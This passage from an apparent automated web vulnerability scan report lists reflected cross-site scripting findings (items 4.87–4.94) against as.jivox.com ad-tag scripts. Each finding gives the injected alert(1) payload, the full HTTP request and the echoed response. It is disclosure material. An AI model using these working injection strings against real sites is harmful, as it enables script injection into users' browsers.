Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the serverName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4197e"%3balert(1)//3bc496d4453 was submitted in the serverName parameter. This input was echoed as 4197e";alert(1)//3bc496d4453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com4197e"%3balert(1)//3bc496d4453&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:52 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57690
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
f(jivoxAdPlayer) != "undefined"){
var jvxAdPlayer = new jivoxAdPlayer();
jvxAdPlayer.setPlayerWidth(300);
jvxAdPlayer.setPlayerHeight(250);
jvxAdPlayer.setServerURL("http://as.jivox.com4197e";alert(1)//3bc496d4453");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com4197e"%3balert(1)//3bc496d4453&iframeTag=on&siteId=24bbcd13d37379&ca
...[SNIP]...

4.87. http://as.jivox.com/player/jivox_ad_tags.php [serverURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the serverURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e52"-alert(1)-"5fe4b721423 was submitted in the serverURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com91e52"-alert(1)-"5fe4b721423&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:50 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com91e52"-alert(1)-"5fe4b721423&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvxSessionId=1307963030.4011");
jvxAdPlayer.setP
...[SNIP]...

4.88. http://as.jivox.com/player/jivox_ad_tags.php [siteId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the siteId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93237"-alert(1)-"1c0ac26dc9c was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d3737993237"-alert(1)-"1c0ac26dc9c&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:01 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d3737993237"-alert(1)-"1c0ac26dc9c&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1
...[SNIP]...

4.89. http://as.jivox.com/player/jivox_ad_tags.php [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9e87"-alert(1)-"50c9a07e8ac was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856d9e87"-alert(1)-"50c9a07e8ac&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:29 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
w jivoxAdPlayer();
jvxAdPlayer.setPlayerWidth(300);
jvxAdPlayer.setPlayerHeight(250);
jvxAdPlayer.setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856d9e87"-alert(1)-"50c9a07e8ac&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLj
...[SNIP]...

4.90. http://as.jivox.com/player/jivox_ad_tags.php [volume parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the volume request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87dc8"-alert(1)-"89cb3bf5b3e was submitted in the volume parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=087dc8"-alert(1)-"89cb3bf5b3e&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:33 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
QkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=087dc8"-alert(1)-"89cb3bf5b3e&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-
...[SNIP]...

4.91. http://as.jivox.com/player/jivox_ad_tags.php [volumeInitAction parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the volumeInitAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 705a7"-alert(1)-"a39bde29291 was submitted in the volumeInitAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute705a7"-alert(1)-"a39bde29291&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:37 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
lieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute705a7"-alert(1)-"a39bde29291&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.j
...[SNIP]...

4.92. http://as.jivox.com/unit/jivox_unit_tags.php [campaignId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/unit/jivox_unit_tags.php

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f8fd'%3balert(1)//af89749ee75 was submitted in the campaignId parameter. This input was echoed as 1f8fd';alert(1)//af89749ee75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=196281f8fd'%3balert(1)//af89749ee75&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:31 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32442

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
var creativeUnitType = '1';
var
...[SNIP]...
<a href="http://as.jivox.com/player/proxy.php?campaignId=196281f8fd';alert(1)//af89749ee75&siteId=24bbcd13d37379&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2k
...[SNIP]...

4.93. http://as.jivox.com/unit/jivox_unit_tags.php [creativeUnitType parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/unit/jivox_unit_tags.php

Issue detail

The value of the creativeUnitType request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8862e'%3balert(1)//e96b38092f was submitted in the creativeUnitType parameter. This input was echoed as 8862e';alert(1)//e96b38092f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=18862e'%3balert(1)//e96b38092f&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:28 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32370

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '18862e';alert(1)//e96b38092f';
    var expandUnitType = '1';
    this.playBtnOrientation = 'right';
    var playBtnContainerInitHeight = ;
    var playBtnContainerInitWidth = ;
    this.playBtnContainerHeight = ;
    this.playBtnContainerW
...[SNIP]...

4.94. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/unit/jivox_unit_tags.php

Issue detail

The value of the expandUnitType request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eabbc'%3balert(1)//3d9d7ab3ac4 was submitted in the expandUnitType parameter. This input was echoed as eabbc';alert(1)//3d9d7ab3ac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1eabbc'%3balert(1)//3d9d7ab3ac4&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
